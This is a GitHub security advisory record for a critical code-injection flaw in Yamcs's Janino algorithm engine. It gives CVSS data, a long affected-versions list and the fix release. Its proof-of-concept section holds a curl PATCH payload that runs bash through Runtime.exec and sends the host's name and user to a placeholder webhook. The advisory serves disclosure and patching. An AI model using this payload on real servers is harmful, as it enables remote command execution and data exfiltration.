GHSA-524g-x36v-9wm6

Source

https://github.com/advisories/GHSA-524g-x36v-9wm6

Import Source

https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-524g-x36v-9wm6/GHSA-524g-x36v-9wm6.json

JSON Data

https://api.test.osv.dev/v1/vulns/GHSA-524g-x36v-9wm6

Aliases

CVE-2026-44632

Published

2026-05-27T00:05:45Z

Modified

2026-05-27T00:15:08.269280685Z

Severity

9.1 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H CVSS Calculator

Summary

Yamcs Vulnerable to Server-Side Code Injection (RCE) via Janino Expression Engine in `JavaExprAlgorithmExecutionFactory`

Details

Summary

A Server-Side Code Injection vulnerability exists in the Yamcs algorithm evaluation engine (org.yamcs.algorithms.JavaExprAlgorithmExecutionFactory). The application dynamically compiles and evaluates user-controlled algorithm text without enforcing a secure sandbox. An authenticated user with the ChangeMissionDatabase privilege can exploit this to achieve Remote Code Execution (RCE) on the underlying host operating system via the Janino compiler.

Proof of Concept (PoC)

The vulnerability can be exploited by overriding an existing algorithm's text via the REST API and injecting a malicious Java payload that executes OS commands.

Prerequisites: 1. A running Yamcs instance with an active processor (e.g., instance=myproject, processor=realtime). 2. An active authentication token for a user with the SystemPrivilege.ChangeMissionDatabase privilege.

Steps to Reproduce:

Send an authenticated HTTP PATCH request to the MDB override endpoint to inject the malicious Java code into an existing algorithm (e.g., copySunsensor). The payload uses java.lang.Runtime to execute a reverse shell or ping an external webhook.

curl -i -X PATCH \
  'http://<YAMCS-SERVER-IP>:8090/api/mdb/myproject/realtime/algorithms/myproject/copySunsensor' \
  -H 'Content-Type: application/json' \
  -H 'Authorization: Bearer <YOUR_AUTH_TOKEN>' \
  -d '{
    "action": "SET",
    "algorithm": {
      "text": "try { java.lang.Runtime.getRuntime().exec(new String[]{\"bash\", \"-c\", \"curl https://<YOUR-WEBHOOK-URL>/$(hostname)_$(whoami)\"}); } catch (Exception e) {} out0.setFloatValue(1.0f);"
    }
  }'

Trigger the algorithm evaluation by sending telemetry data that the algorithm depends on (e.g., running the simulator.py script to generate sun sensor data).
The Yamcs server uses the Janino SimpleCompiler to compile the injected text into a Java class on the fly. Since no restrictive ClassLoader is applied, the payload is successfully compiled and executed.
Verify that the command executed successfully on the host machine by checking the incoming HTTP request on the provided webhook URL.

Impact

This vulnerability allows a user with application-level configuration privileges to escalate their access to full System/OS control. This leads to arbitrary command execution, potential data exfiltration, and lateral movement within the network hosting the Yamcs server.

Credits

Discovered & reported by Pablo Picurelli Ortiz (@superpegaso2703), cybersecurity student at Universidad Rey Juan Carlos.

Database specific

{
    "github_reviewed_at": "2026-05-27T00:05:45Z",
    "nvd_published_at": null,
    "severity": "CRITICAL",
    "github_reviewed": true,
    "cwe_ids": [
        "CWE-94"
    ]
}

References

Affected packages

Maven / org.yamcs:yamcs-core

Package

Name: org.yamcs:yamcs-core; View open source insights on deps.dev
Purl: pkg:maven/org.yamcs/yamcs-core

Affected ranges

Type: ECOSYSTEM
Events: Introduced

0Unknown introduced version / All previous versions are affected

Fixed

5.12.7

Affected versions

0.*

0.29.3

0.30.0

3.*

3.0.0

3.1.0

3.1.1

3.1.2

3.2.0

3.2.1

3.2.2

3.3.0

3.3.1

3.4.0

3.4.1

3.4.2

3.4.3

3.4.4

3.4.5

3.4.6

3.4.8

3.4.11

4.*

4.0.0

4.0.1

4.1.1

4.1.2

4.2.0

4.2.1

4.2.2

4.3.0

4.3.1

4.4.0

4.4.1

4.4.2

4.5.0

4.6.0

4.6.1

4.6.2

4.6.3

4.7

4.7.1

4.7.3

4.8.0

4.8.1

4.9.0

4.9.1

4.9.2

4.9.3

4.9.4

4.10.0

4.10.1

4.10.2

4.10.3

4.10.4

4.10.5

4.10.6

4.10.7

4.10.8

4.10.9

5.*

5.0.0

5.1.0

5.1.1

5.1.2

5.1.3

5.1.4

5.2.0

5.2.1

5.2.2

5.2.3

5.2.4

5.2.5

5.2.6

5.3.0

5.3.1

5.3.2

5.3.3

5.3.4

5.3.5

5.3.6

5.4.0

5.4.1

5.4.2

5.4.3

5.4.4

5.4.5

5.5.0

5.5.1

5.5.2

5.5.3

5.5.4

5.5.5

5.5.6

5.5.7

5.6.0

5.6.1

5.6.2

5.7.0

5.7.1

5.7.2

5.7.3

5.7.4

5.7.5

5.7.6

5.7.7

5.7.8

5.7.9

5.7.10

5.7.11

5.7.12

5.7.13

5.8.0

5.8.1

5.8.2

5.8.3

5.8.4

5.8.5

5.8.6

5.8.7

5.8.8

5.9.0

5.9.1

5.9.2

5.9.3

5.9.4

5.9.5

5.9.6

5.9.7

5.9.8

5.9.8.1

5.9.9

5.9.10

5.9.11

5.9.12

5.10.0

5.10.1

5.10.2

5.10.3

5.10.4

5.10.5

5.10.6

5.10.7

5.10.8

5.10.9

5.10.10

5.10.11

5.10.12

5.11.0

5.11.1

5.11.2

5.11.3

5.11.4

5.11.5

5.11.6

5.11.7

5.11.8

5.11.9

5.11.10

5.11.11

5.11.12

5.11.13

5.12.0

5.12.1

5.12.2

5.12.3

5.12.4

5.12.5

5.12.6

Database specific

source

"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/05/GHSA-524g-x36v-9wm6/GHSA-524g-x36v-9wm6.json"